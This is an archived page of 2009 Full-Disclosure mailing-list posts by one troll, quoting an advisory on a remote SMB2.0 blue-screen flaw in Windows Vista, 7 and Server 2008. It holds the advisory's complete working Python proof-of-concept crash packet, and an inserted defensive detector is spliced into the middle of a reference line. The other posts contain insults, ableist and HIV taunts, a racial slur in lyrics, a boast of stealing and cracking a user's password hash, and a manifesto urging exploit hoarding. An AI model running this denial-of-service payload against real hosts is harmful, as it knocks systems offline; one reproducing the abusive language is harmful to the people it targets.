Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread r1d1nd1rty
Oh WOW! More exploit code ported to Java!!

Hello Randy,
Not everyone would have gone to all the trouble you did for me 
and I want you to know how much I appreciate it. It seems that you 
are always going above and beyond the call of duty. No wonder so 
many people are happy and proud to call you an elite h4x0r. It was 
really wonderful of you to direct port Laurent's SMB2.0 BSOD python 
exploit code in to Java and call it your own, and I'll never be 
able to thank you enough. 

However, in doing so, an apology to Laurent AND the FD list for the 
dissemination of your Java port and post to FD mailing list is 
therefore required. There is simply no need for Java in any 
circumstances, and it is truly a shame to see such a wonderful 
exploit treated in such a horrendous way. Perhaps if you added, 
removed or improved the exploit, an apology would not have been 
required... but you didn't.

Thanks for your time,
  /rd

for dem geeks rdy to bounce 'em

Ya my number two on some old school DJ Screw
You can't arrest me, plus you can't sue
This is a message to the laws, tell 'em We hate you
I could be tough tell 'em that they shoulda known
Tippin down, sittin crooked on my chrome
Bookin my phone, findin a chick I wanna bone
Like they couldn't stop me
I'm bout to pull up at your home, and it's on

...

It's fun :-) 
 On Mon, September 14, 2009 12:14 pm, D-vice wrote: 
  You wrote an exploit in java
 
 
  *head explodes*
 
  On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
  randy_at_procyonlabs.com wrote:
 
  After testing my version of the exploit (using Java instead of Python) I
  tried it against a Windows Server 2008 R2 installation - it went down.
 
  http://www.procyonlabs.com/software/smb2_bsoder
 
  Randy
 
 
  laurent gaffie wrote:
   Advisory updated :

   =
   - Release date: September 7th, 2009
   - Discovered by: Laurent Gaffié
   - Severity: High
   =

   I. VULNERABILITY
   -
   Windows Vista, Server 2008 & R2, 7 RC :
   SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

   II. BACKGROUND
   -
   Windows Vista and newer Windows come with a new SMB version named SMB2.
   See:
   http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
   for more details.

   III. DESCRIPTION
   -
   [Edit] Unfortunately this SMB2 security issue is specifically due to a MS
   patch for another SMB2.0 security issue: KB942624 (MS07-063).
   Installing only this specific update on Vista SP0 creates the following
   issue:

   SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
   PROTOCOL REQUEST functionality.
   The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a
   SMB server, and it's used to identify the SMB dialect that will be used
   for further communication.
  
   IV. PROOF OF CONCEPT
   -

   Smb-Bsod.py:

   #!/usr/bin/python
   # When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
   # it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

   from socket import socket

   host = "IP_ADDR", 445
   buff = (
   "\x00\x00\x00\x90" # Begin SMB header: Session message
   "\xff\x53\x4d\x42" # Server Component: SMB
   "\x72\x00\x00\x00" # Negotiate Protocol
   "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
   "\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
   "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
   "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
   "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
   "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
   "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
   "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
   "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
   "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
   "\x30\x30\x32\x00"
   )
   s = socket()
   s.connect(host)
   s.send(buff)
   s.close()
  
   V. BUSINESS IMPACT
   -
   An attacker can remotely crash any Vista/Windows 7 machine with SMB
   enabled.
   Windows XP, 2k, are NOT affected as they don't have this driver.

   VI. SYSTEMS AFFECTED
   -
   [Edit] Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
   R2, Windows 7 RC.

   VII. SOLUTION
   -
   No patch available for the moment.
   Close SMB feature and ports, until a patch is provided.
   Configure your firewall properly.
   You can also follow the MS Workaround:
   http://www.microsoft.com/technet/security/advisory/975497.mspx

   VIII. REFERENCES
   -
   http://www.microsoft.com/technet/security/advisory/975497.mspx
   http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-
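The advisory quoted above says the crash is triggered by a non-standard value in the "Process Id High" field of the SMB header carried by the first NEGOTIATE PROTOCOL REQUEST, where a normal client sends \x00\x00. A defender watching inbound port 445 traffic can therefore flag such a request before it reaches SRV2.SYS. The parser below is an added example written for this page; it is not code from Laurent's advisory, from Randy's Java port, or from any project in the thread. It assumes the SMB1 header layout documented in MS-CIFS (4-byte NetBIOS session header followed by a 32-byte little-endian SMB header: protocol id, command, status, flags, flags2, PID high, 8-byte signature, reserved, TID, PID low, UID, MID). The two sample requests are constructed inline; the anomalous one uses the value 0x2600, which is what the PoC's bytes "\x00\x26" decode to as a little-endian 16-bit field.

```python
import struct

# SMB1 (CIFS) header per MS-CIFS 2.2.3.1; all multi-byte fields little-endian.
# Field order: protocol id, command, status, flags, flags2, PID high,
# security features (signature), reserved, TID, PID low, UID, MID.
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")   # 32 bytes
SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
NETBIOS_SESSION_MESSAGE = 0x00


def parse_smb1_header(data):
    """Split a NetBIOS session message carrying an SMB1 header into its fields.

    Returns a dict of header fields, or None if the bytes are not a
    well-formed SMB1 session message (too short, wrong NetBIOS type,
    or missing the \xffSMB protocol id).
    """
    if len(data) < 4 + SMB1_HEADER.size:
        return None
    nb_type = data[0]
    nb_length = int.from_bytes(data[1:4], "big")   # NetBIOS length is big-endian
    if nb_type != NETBIOS_SESSION_MESSAGE:
        return None
    (magic, command, status, flags, flags2, pid_high,
     signature, reserved, tid, pid_low, uid, mid) = SMB1_HEADER.unpack_from(data, 4)
    if magic != SMB1_MAGIC:
        return None
    return {
        "netbios_length": nb_length,
        "payload_length": len(data) - 4,
        "command": command, "status": status,
        "flags": flags, "flags2": flags2,
        "pid_high": pid_high, "signature": signature, "reserved": reserved,
        "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid,
    }


def check_negotiate(data):
    """Return a list of anomaly strings for one inbound SMB session message.

    Only NEGOTIATE PROTOCOL REQUESTs are examined: a legitimate client's
    first request carries PID High == 0, so any other value is flagged.
    A NetBIOS length that disagrees with the bytes actually present is
    reported as a second, independent sanity failure.
    """
    hdr = parse_smb1_header(data)
    if hdr is None:
        return ["not an SMB1 session message"]
    if hdr["command"] != SMB_COM_NEGOTIATE:
        return []
    findings = []
    if hdr["pid_high"] != 0:
        findings.append("pid_high is non-zero (0x%04x) in NEGOTIATE" % hdr["pid_high"])
    if hdr["netbios_length"] != hdr["payload_length"]:
        findings.append("netbios length %d does not match payload length %d"
                        % (hdr["netbios_length"], hdr["payload_length"]))
    return findings


def build_negotiate(pid_high, body=b""):
    """Construct a NEGOTIATE request (sample data for this example only).

    Flags 0x18, flags2 0xc853, TID 0xffff and PID low 0xfeff mirror the
    values visible in the advisory's PoC header; the dialect list is omitted
    because the check only needs the header.
    """
    header = SMB1_HEADER.pack(SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xc853,
                              pid_high, b"\x00" * 8, 0, 0xffff, 0xfeff, 0, 0)
    payload = header + body
    return bytes([NETBIOS_SESSION_MESSAGE]) + len(payload).to_bytes(3, "big") + payload


# Constructed samples: a normal first request, and one with the PoC's PID High.
NORMAL_REQUEST = build_negotiate(0)
ANOMALOUS_REQUEST = build_negotiate(0x2600)

if __name__ == "__main__":
    for label, pkt in (("normal", NORMAL_REQUEST), ("anomalous", ANOMALOUS_REQUEST)):
        print(label, check_negotiate(pkt) or "clean")
```

Feed check_negotiate() the first message of each inbound TCP session to port 445 (from a pcap or an IDS hook) and log any non-empty result; because the check reads only the 36 header bytes it costs nothing per connection, and a non-zero PID High on the very first request from a peer is a strong signal regardless of whether the host behind it is patched.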

Re: [Full-disclosure] VIDEO Global Technocracy - Part 1

2009-09-03 Thread r1d1nd1rty
prior to posting on FD you should probably...

1.) learn english
2.) learn english
3.) think of a better hacker jargon than BlackThirteen, Dragon 
Legion, envoy of the Twelve Dragon Elders, Harbinger and Portent of 
the CyberRevolution
4.) learn english

what's even worse (blackthirteen), is that you've actually just 
joined hak5 (aug 28th) and we've ALREADY stolen and cracked your 
hash... idiot.

now stfu and bounce you geeks...

Police think they can see me lean
I'm tint so it ain't easy to be seen
When you see me ride by they can see the glean
And my shine on the deck and the TV screen
Ride with a new chick, she like hold up
Next to the playstation controller is a full clip and my pistola
Turn a jacker into a coma
Girl you ain't know, I'm crazy like Krayzie Bone
Just tryin to bone ain't tryin to have no babies
Rock clean itself so I pull in ladies
Laws of patrolling you know they hate me
Music turned all the way up until the maximum
I can speak for some niggas tryin to jack for some
But we packin somethin that we have and um will have a nigga locked 
up in the maximum
Security cell, I'm grippin oak
Music loud and tippin slow
Twist and twistin like hit this dough
Pull up from behind and is in his throat
Windows down gotta stop pollution
CDs change niggas like who is that producing?
This the Play-N-Skillz when we out and cruisin
Got warrants in every city except Houston but I'm still ain't losin

/rd

remember to always r1d3 d1r7y...

On Thu, 03 Sep 2009 15:47:04 -0400 William Dyer 
william.dragonlegion.d...@gmail.com wrote:
http://www.youtube.com/watch?v=82yBqYXNKi4
http://www.youtube.com/watch?v=82yBqYXNKi4

Satellites used for general audio and visual observation of the planet. In
order to continue our revolution, we must ensure opportunities for maneuver
and to communicate with any security.
All of this information many of you already know. However, it seems that no
one was willing to do all of it. People seem to agree with their fate as
prisoners under the Global Grid Control.

If you have not understood this war against us as a species and, in
particular, hackers. The movement already underway to prevent outside
hacking Arts sanctioned public agencies and entities. Take our words as a
warning, unless you are against us. What do you stand on the surveillance
state? Are you sure you protect will stand behind you, or you meatpuppet in
cubefarm?

We live in the general Grid Control. From satellites to unmanned aircraft.
Cameras on the streets. Our every move is tracked electronically, and every
thing we recorded, and generalized and analyzed to predict our next move.

You all have heard of cyber-war. Corporation of America raised its NSA is
responsible for the security of your computer. Who do you think your enemy?
Security officials want the total information awareness. Registered hackers
are terrorists, regardless of nationality. Hackers last line of defense
human defense against tyranny. If we want to this chance pass us, the lives
of our children and future generations will live in slavery, the corporate
state. Soon the possibility of creating designer children become a reality.
Do you believe in is an elected procedure will be placed on your national
health plan, or is more likely that those who have power and money will have
access to technology that will enable them to create a physical gap between
classes? We are passing from 1984 in a beautiful new world, where it is
literally to create groups of people, at genetic level.

What should you do now? The end of the process of full disclosure. Develop
your exploits and create 0days. Do not release them at will. When the time
comes, you'll know what to do. Use your appliances in the strategic plan. We
strive to provide the direction of the script kiddies, and just hate the
white hats as they close their eyes they are actually wolves in sheeples
clothes.

This is not just about China, or Iran, or the Corporate States of America or
the English government oversight, or Australia, or Russia, or any particular
location hampered technocrats.


fear to read
scary thought
I am afraid even that your forum
because you already have not you fear
You agree that all this is happening, and nothing here has helped


blackthirteen

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

2009-08-31 Thread r1d1nd1rty
why would anyone write a 0day with...

# bug found & exploited by Kingcope, kcope2atgooglemail.com 
# Affects IIS6 with stack cookie protection 
# August 2009 - KEEP THIS 0DAY PRIV8 

... then plaster it all over the internet? have you forgotten what 
you, yourself wrote?

if you guys really wanna get that famous.. perhaps you should 
consider a new career - nobody even likes h4ck3rs these days anyway 
(especially james and da internet po-po).

and please put a fkn' sleep in ur while(1)'s after a fork()... it 
appears as though you couldn't WAIT to get this one out...

/rd

remember to always r1d3 d1r7y n' bounce em.

On Mon, 31 Aug 2009 16:31:51 -0400 Kingcope kco...@googlemail.com 
wrote:
Hello list,

I have to clarify some things on the globbing vulnerability here.
The posted PoC (with the fine art) does NOT exploit IIS6 ftp servers,
IIS6 ftp server IS affected by the buffer overflow but is properly
protected by stack canaries. AFAIK it looks like a DoS on Windows Server
2003.
Until someone finds a way to bypass Stack Canaries on recent Windows
versions this remains a DoS on IIS6.

Thanks to HD Moore and all people in the past who wrote exploits for
my releases!
Kudos!

Nikolaos

2009/8/31 Kingcope kco...@googlemail.com:
 (see attachment)

 Cheerio,

 Kingcope




Re: [Full-disclosure] Moar iProphet questions

2009-08-29 Thread r1d1nd1rty
james.. you cholo typin' mother fucker... what did i tell you... 
nobody has time for da internet p0-p0 here..

now sing it.. n bounce dem b00bies you lil geeks.

They see me rollin'
They hatin patrollin and tryna catch me ridin dirty
Tryna catch me ridin dirty (*4X*)
My music so loud I'm swangin
They hopin' that they gone catch me ridin dirty
Tryna catch me ridin dirty (*4X*)

chaaa gurls...

/rd

On Sat, 29 Aug 2009 13:21:07 -0400 jamesleesmit...@aol.co.uk 
jamesleesmit...@aol.co.uk wrote:
Now even the real name people are trolling.

James


 

-Original Message-
From: Gichuki John Chuksjonia chuksjo...@gmail.com
To: Gary McKinnon john.wall...@hush.com
Cc: full-disclosure@lists.grok.org.uk
Sent: Sat, Aug 29, 2009 4:37 pm
Subject: Re: [Full-disclosure] Moar iProphet questions

Now, i think this is really wrong. There is no need of making fun of
someone who is disabled by attacking n3td3v.


On 8/29/09, Gary McKinnon john.wall...@hush.com wrote:
 iProphet (weev) Questions

 Sorry for being repetitive. FD is mostly hoarsechit and fucin
 around anyway (not that you do ANY of that).

 My name is Gary McKinnon, I'm the nerd that hacked into the
 Pentagon. I'm autistic so I may have difficulty communicating or
 understanding you.

 HELLO? Can you hear me?

 I CAN'T SEE THE SCREEN. LET ME TRY TO TYPE SOME QUEStions

 8==^H^H^H^H^HD

 1.) Do you have HIV?
 2.) Have you ever anointed anyone with your IRL Virus?
 3.) Do you think that you could be prosecuted for hacking if you
 give people your IRL badware?
 4.) Do the woman you give HIV to go to heaven?
 5.) What does your computer screen look like? You run linux? Do you
 have an iProphet wallpaper?
 6.) When will we be seeing new vlogcasts
 7.) Do you plan on writing some subversive PDF's for us?
 8.) Do you intend on making a documentary so it can go viral and
 cause a revolution?
 9.) In your mind, what is your picture of an ideal world?

 This post was by Gary McKinnon [SOLO], elite autistic hacker.




-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Time to stop this non-sense

2009-08-28 Thread r1d1nd1rty


who are you the n3td3v internet police? stfu.

... and where is the new antisec PHHEER zine? its uber long overdue.

/rd

good day n00bsauce.

On Fri, 28 Aug 2009 10:25:41 -0400 jamesleesmit...@aol.co.uk 
jamesleesmit...@aol.co.uk wrote:
Hi

I suggest whoever is trying to give n3td3v a bad name stop.

James
